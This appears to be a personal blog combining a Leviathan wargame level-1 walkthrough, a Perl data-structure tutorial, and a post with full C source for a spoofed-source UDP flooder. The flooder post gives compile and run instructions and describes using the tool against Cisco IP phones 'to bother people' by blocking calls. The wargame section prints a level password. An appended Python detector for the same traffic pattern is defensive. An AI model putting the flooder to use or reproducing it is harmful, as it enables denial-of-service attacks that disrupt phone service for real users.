Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

Now that we are connected, let's try the first command to look around:

ls -a lists everything in the directory, including hidden files and folders (names starting with a dot)

level1@leviathan:~$ ls -a
.  ..  .backup  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd

Hmmm, there is a hidden « .backup » folder; let's enter it and list it.

level1@leviathan:~$ cd ./.backup
level1@leviathan:~/.backup$ ls -a
bookmarks.html

OK, bookmarks; let's see if there are some « passwords » in there

level1@leviathan:~/.backup$ cat ./bookmarks.html |grep pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
level1@leviathan:~/.backup$

Easy … we got it

See you at the next level :)

Perl reference and hashtable

Today I was writing some Perl and wanted to build something like a C pointer to an array whose elements hold a hash table, and I spent ages reading rubbish. I finally found the solution and would like to show it to you in this brief post.


my $siteWeb = [
        ['Site1' =>
                {'address' => 'address',
                 'add'     => 'add'}],
        ['Site2' =>
                {'address' => 'address',
                 'add'     => 'add'}],
        ['Site3' =>
                {'address' => 'address',
                 'add'     => 'add'}]
        ];

Above, I define a reference to an array (the outer [ ... ]):


my $siteWeb = [
...

each element of that array is itself an anonymous array:


my $siteWeb = [
        ['Site1' =>
...

and inside each inner array, cell [0] is the site name ('Site1'; the => here is just a fancy comma) and cell [1] is a hash reference that contains the site's data:


my $siteWeb = [
        ['Site1' =>
                {'address' => 'address',
                 'add'     => 'add'}],

and to walk the structure I can use this:


my $Sw = @{$siteWeb};          # number of elements in the referenced array (3)

for (my $i = 0; $i < $Sw; $i++) {          # < not <=: indexes run from 0 to $Sw - 1
        print "$siteWeb->[$i][0]\n";            # cell [0]: the site name
        print "  $siteWeb->[$i][1]{address}\n"; # cell [1]: the hash, here its 'address' key
}

To know how many cells there are in the referenced array I use this syntax:


my $Sw = @{$siteWeb};

Dereferencing with @{...} and using the result in scalar context gives the number of elements of the array behind the reference (the last valid index is $Sw - 1, also available as $#{$siteWeb}).
Anyway this was fun, because I'm learning Perl and I really like it.
I hope this helps you one day ;)

UDP Flooder in C

Yesterday we were still working on some attacks on our test bench, and tried some exploits against the phones
that we found on the internet. Most of them DoS the phone, but they also lock it up:
when people try to make a call, they find the phone frozen. So with my friend I made
some modifications to a UDP flooder I had written in C a few years ago.

It sends UDP datagrams to random ports of a specific address with a random (spoofed) source address, and only works on Linux
(it uses a raw socket, so it has to run as root). The code lets us break the connection between the 2 phones:
one is trying to reach the other, but the other is too busy answering all the « pings » and sending
replies to random addresses that cannot answer.

We also noticed that once the call between the 2 phones is established, the phone
is not affected.

Here is the code:

#define __FAVOR_BSD   // BSD field names (uh_sport, ...) in struct udphdr
#define _USE_BSD

#include <stdio.h>      // printf/fprintf/perror
#include <stdlib.h>     // malloc/free/rand/exit
#include <string.h>     // memset/memcpy
#include <time.h>       // time() to seed rand()
#include <unistd.h>     // usleep/close
#include <sys/types.h>  // u_short/u_char

#include <sys/socket.h> // socket()/setsockopt()/sendto()
#include <netinet/in.h> // struct sockaddr_in
#include <netinet/ip.h> // struct ip
#include <netinet/udp.h> // struct udphdr
#include <arpa/inet.h>  // inet_addr()/htons()

#define PADDING_SIZE 1      // one byte of payload
#define N_LOOP 10           // datagrams per phone
#define U_WAITING 100000    // microseconds between two datagrams

void udp(char *);
unsigned short int in_chksum(unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

int main(void) {
int i;
srand(time(NULL));

for (i = 0; i < N_LOOP; i++)
 {
 udp("xxx.xxx.xxx.xxx");   // first phone
 usleep(U_WAITING);
 printf("-");
 udp("xxx.xxx.xxx.xxx");   // second phone
 usleep(U_WAITING);
 printf("+");
 fflush(stdout);           // progress marks have no newline, flush them
 }
return 0;
}

void udp(char *cible) {

int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);   // raw socket: needs root / CAP_NET_RAW
if (sd == -1) {
fprintf(stderr, "socket() error, root ?\n");
exit(-1);
}

unsigned long ip_src = hasard(4294967295UL / 2, 4294967295UL); // random, spoofed source address
unsigned long ip_dst = inet_addr(cible);
unsigned short p_src = htons((unsigned short) hasard(0, 65535)); // random ports, network order
unsigned short p_dst = htons((unsigned short) hasard(0, 65535));

struct sockaddr_in sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst

struct ip *ip;
struct udphdr *udp;
char *dgm, *data;

int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize);
if (dgm == NULL) {
perror("malloc");
exit(-1);
}
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));

memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);

int un = 1;   // IP_HDRINCL: we build the IP header ourselves
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
 {
 perror("setsockopt(IP_HDRINCL)");
 exit(-1);
 }

// IP header

ip->ip_v = 4;
ip->ip_hl = 5;                        // 20 bytes, no options
ip->ip_tos = 0;
ip->ip_len = htons(pksize);           // total length in network order (was sizeof(pksize), a bug)
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = htons((unsigned short) rand());
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0;                       // must be zero while the checksum is computed
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;
ip->ip_sum = in_chksum((unsigned short *) ip, sizeof(struct ip));

// UDP header

udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr) + PADDING_SIZE);
udp->uh_sum = 0;                      // UDP checksum is optional over IPv4

// send
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
 sizeof(sin)) == -1) {
 perror("sendto()");
 }

// free the memory
free(dgm);
close(sd);
}

unsigned short in_chksum(unsigned short *addr, int len) // taken from papasmurf.c
{
 register int nleft = len;
 register unsigned short *w = addr;
 register int sum = 0;
 unsigned short answer = 0;

 while (nleft > 1)
 {
 sum += *w++;
 nleft -= 2;
 }

 if (nleft == 1)
 {
 *(u_char *)(&answer) = *(u_char *)w;
 sum += answer;
 }

 sum = (sum >> 16) + (sum & 0xffff);  // fold the carries (was `sum + 0xffff`, a typo)
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

// random integer in the inclusive range [min, max]
unsigned long hasard(unsigned long min, unsigned long max){
return (unsigned long) (min + ((double) rand() / RAND_MAX * (max - min)));
}

This works quite well to bother people without damaging the phone.
You can compile it with the following command:

gcc -o udp udp.c

and run it (as root, because of the raw socket) with

./udp

if everything is working you should see

+-+-+-

appearing while it runs.

We tested it on Cisco 7940 phones and it worked well … soon we will publish some new code.

Have fun.
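To close the loop from the defender's side, here is an added example (not part of the original post) that looks for exactly the pattern this tool produces, an ever-changing spoofed source address, random destination ports and a one-byte payload, in tcpdump-style UDP lines. The capture below is constructed from documentation address ranges (198.51.100.0/24, 192.0.2.0/24); nothing in it was captured from the phones in the post.

```python
"""Detect the traffic pattern the flooder above produces (spoofed, ever-changing
source addresses, random destination ports, tiny payloads) in tcpdump-style
output.  Added example; the sample lines are constructed."""
import re
from collections import defaultdict

# 12:00:00.000001 IP 203.0.113.5.40123 > 192.0.2.10.5060: UDP, length 1
LINE_RE = re.compile(
    r'^\S+ IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > '
    r'(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): UDP, length (?P<len>\d+)$')


def parse_udp(lines):
    """Yield (src, sport, dst, dport, length) for each UDP line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield (m['src'], int(m['sport']), m['dst'], int(m['dport']), int(m['len']))


def summarize(lines):
    """Per destination host: packet count, distinct sources, distinct ports,
    and how many payloads are tiny (<= 8 bytes)."""
    per_dst = defaultdict(lambda: {'packets': 0, 'sources': set(), 'ports': set(), 'tiny': 0})
    for src, _sport, dst, dport, length in parse_udp(lines):
        s = per_dst[dst]
        s['packets'] += 1
        s['sources'].add(src)
        s['ports'].add(dport)
        if length <= 8:
            s['tiny'] += 1
    return per_dst


def detect_udp_flood(lines, min_packets=10, min_source_ratio=0.8,
                     min_port_ratio=0.5, min_tiny_ratio=0.9):
    """Return {dst: reason} for destinations whose UDP traffic looks like the
    flooder: almost every packet from a new source (spoofing), spread over many
    ports, and carrying (almost) no data.  SIP/RTP between a handful of phones
    on fixed ports with real payloads does not trip these ratios."""
    flagged = {}
    for dst, s in summarize(lines).items():
        n = s['packets']
        if n < min_packets:
            continue
        source_ratio = len(s['sources']) / n
        port_ratio = len(s['ports']) / n
        tiny_ratio = s['tiny'] / n
        if (source_ratio >= min_source_ratio and port_ratio >= min_port_ratio
                and tiny_ratio >= min_tiny_ratio):
            flagged[dst] = (f"{n} pkts, {len(s['sources'])} sources, "
                            f"{len(s['ports'])} dst ports, {tiny_ratio:.0%} tiny payloads")
    return flagged


# Constructed capture: 12 spoofed 1-byte datagrams at 192.0.2.10, interleaved
# with a normal SIP exchange between two phones (192.0.2.20 <-> 192.0.2.11).
SAMPLE_CAPTURE = [
    f"12:00:00.{i:06d} IP 198.51.100.{i + 1}.{40000 + 37 * i} > 192.0.2.10.{1000 + 977 * i}: UDP, length 1"
    for i in range(12)
] + [
    "12:00:00.500000 IP 192.0.2.20.5060 > 192.0.2.11.5060: UDP, length 412",
    "12:00:00.600000 IP 192.0.2.11.5060 > 192.0.2.20.5060: UDP, length 380",
    "12:00:00.700000 IP 192.0.2.20.5060 > 192.0.2.11.5060: UDP, length 398",
]

if __name__ == "__main__":
    for dst, reason in detect_udp_flood(SAMPLE_CAPTURE).items():
        print(f"UDP flood towards {dst}: {reason}")
```

The thresholds are starting points for a lab; on a real trunk the per-destination window should be time-bounded (say one second), and the source-ratio test is what separates this tool's spoofing from a legitimate burst of many clients hitting one service port.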
